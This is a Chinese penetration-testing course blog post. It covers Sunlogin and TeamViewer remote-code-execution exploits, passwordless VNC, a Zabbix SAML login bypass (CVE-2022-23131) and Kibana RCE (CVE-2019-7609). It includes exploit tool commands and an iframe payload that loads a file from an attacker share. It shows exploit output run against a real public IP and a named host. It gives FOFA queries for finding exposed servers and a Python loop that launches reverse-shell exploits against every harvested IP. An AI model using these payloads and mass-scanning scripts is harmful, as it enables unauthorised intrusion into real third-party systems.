【小迪安全2023】第58天:服务攻防-应用协议&设备Kibana&Zabbix&远控向日葵&VNC&TV

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!


目录

大纲

知识点:

一、远程控制-向日葵&Vnc&Teamviewe

二、设备平台-Zabbix-CVE-2022-23131

0x1 前言

0x2 漏洞影响

0x3 漏洞复现

三、CVE-2019-7609:Kibana远程代码执行漏洞复现

0x1简介

0x2 漏洞概述

0x3 影响版本

0x4 漏洞复现:


大纲

知识点:

1、远程控制-第三方应用安全

2、三方应用-向日葵&VNC&TV

3、设备平台-Zabbix&Kibana漏洞

#章节内容:
常见服务应用的安全测试:
1、配置不当-未授权访问
2、安全机制-特定安全漏洞
3、安全机制-弱口令爆破攻击
 
#前置知识:
应用服务安全测试流程:见图
1、判断服务开放情况-端口扫描&组合应用等
2、判断服务类型归属-数据库&文件传输&通讯等
3、判断服务利用方式-特定漏洞&未授权&弱口令等

一、远程控制-向日葵&Vnc&Teamviewe

1、下面这个是存在远程命令执行漏洞的向日葵:

GitHub - Mr-xn/sunlogin_rce: 向日葵 RCE

2、这个是远程命令执行的工具:

GitHub - Fheidt12/XRK-RCE: 向日葵远程命令执行漏洞

xrkRce.exe -h 192.168.233.140 -t scan
xrkRce.exe -h 192.168.233.140 -t rce -p 49516 -c "ipconfig"

Vnc

在使用的过程中有两个问题:
在security中有设置选项,这个就是设置安全的。
如果设置为none,则就不需要密码就可以直接连接这个主机
 
安全中有几种模式:Windows password,VNC password,None

用客户端去连接这台主机,并不用输入账号密码,就可以直接连接
 
也可在fofa中搜:app="VNC"&port="5900"
 
这个密码是可以参加的,在hydra中是支持这个vnc猜解的。没有账号。

Teamviewe

这个类似于网站钓鱼,需要管理员访问特定的地址(我们构造的)
 
构造的html代码:
<!DOCTYPE html>
<html>
<head>
    <title>cve-2020-13699</title>
</head>
<body>
    <p>Welcome to xiaodi!</p>
    <iframe style="height:1px;width:1px;" src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
</body>
</html>
 
 
当管理员去访问:http://192.168.233.1:8081/web/test.html
这个时候就会自动运行这个软件。
 
teamviewer10: --play \\attacker-IP\share\fake.tvs是执行命令,如果要执行什么就可以进行修改完成测试。

二、设备平台-Zabbix-CVE-2022-23131

0x1 前言

zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。

0x2 漏洞影响

5.4.8

5.0.18

4.0.36

默认端口:10051

漏洞复现参考文章:

Zabbix登录绕过漏洞复现(CVE-2022-23131)-阿里云开发者社区

0x3 漏洞复现

FOFA检索:app="ZABBIX-监控系统" && body="saml"

自动化脚本工具如下:

┌──(root💀kali)-[~/桌面/cve-2022-23131-main]
└─# python3 cve-2022-23131.py http://20.16.77.158 Admin  

decode_payload: {"saml_data": {"username_attribute": "Admin"}, "sessionid": "9dba05c99b9dd5cd2c6b6915f8732f63", "sign": "58b5d6ee7d6597f1b275026c1b5b089ddde803403f93a053db0bcf372342a8a7"}
zbx_signed_session: eyJzYW1sX2RhdGEiOiB7InVzZXJuYW1lX2F0dHJpYnV0ZSI6ICJBZG1pbiJ9LCAic2Vzc2lvbmlkIjogIjlkYmEwNWM5OWI5ZGQ1Y2QyYzZiNjkxNWY4NzMyZjYzIiwgInNpZ24iOiAiNThiNWQ2ZWU3ZDY1OTdmMWIyNzUwMjZjMWI1YjA4OWRkZGU4MDM0MDNmOTNhMDUzZGIwYmNmMzcyMzQyYThhNyJ9

GitHub - L0ading-x/cve-2022-23131: cve-2022-23131

修改cookie值,然后点击SAML,就可以进入这个监控系统了

https://scan.ibt.uk.com/zabbix.php?action=dashboard.list

三、CVE-2019-7609:Kibana远程代码执行漏洞复现

0x1简介

Kibana 是为 Elasticsearch设计的开源分析和可视化平台。你可以使用 Kibana 来搜索,查看存储在 Elasticsearch 索引中的数据并与之交互。你可以很容易实现高级的数据分析和可视化,以图标的形式展现出来。

默认端口:5601

0x2 漏洞概述

攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。

0x3 影响版本

Kibana < 6.6.1

Kibana < 5.6.15

0x4 漏洞复现:

CVE-2019-7609:Kibana远程代码执行漏洞复现-腾讯云开发者社区-腾讯云

漏洞自动化脚本工具:

GitHub - LandGrey/CVE-2019-7609: exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts

FOFA检索语句:port="5601" && country="CN"

然后使用我们前一天讲的那个批量导出FOFA信息的工具,导出来然后保存为ips.txt,放在工具目录下

下面是可以进行批量扫描漏洞的python脚本,把这个脚本放在开始下载的那个CVE-2019-7609脚本工具文件夹下

import os
for ip in open('ips.txt'):
  ip=ip.strip()
  cmdline='python2 CVE-2019-7609-kibana-rce.py -u %s -host 10.10.10.128 -port 5566 --shell'%ip
  print(cmdline)
  os.system(cmdline)
  #print(ip)

然后执行命令,进行监听,这里没有做授权,所以就不给师傅们演示了。

最近更新

  1. TCP协议是安全的吗?

    2024-04-27 03:22:01       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-27 03:22:01       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-04-27 03:22:01       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-04-27 03:22:01       18 阅读

热门阅读

  1. Mybatis之if标签判断boolean值

    2024-04-27 03:22:01       13 阅读
  2. look-behind requires fixed-width pattern_正则表达式

    2024-04-27 03:22:01       13 阅读
  3. C++ Primer Plus

    2024-04-27 03:22:01       12 阅读
  4. manim

    2024-04-27 03:22:01       16 阅读
  5. Mysql索引篇

    2024-04-27 03:22:01       12 阅读
  6. 什么是prettier的glob 模式

    2024-04-27 03:22:01       15 阅读
  7. 【DataGrip】 sql语句:模糊搜索

    2024-04-27 03:22:01       14 阅读
  8. 删除有序序列中的重复项 python

    2024-04-27 03:22:01       14 阅读
  9. Jammy@Jetson Orin - Tensorflow & Keras Get Started

    2024-04-27 03:22:01       12 阅读
  10. 面试题:判断一个完全平方数

    2024-04-27 03:22:01       15 阅读
  11. Ali-Sentinel-入口控制

    2024-04-27 03:22:01       13 阅读
  12. SQL数据更新

    2024-04-27 03:22:01       12 阅读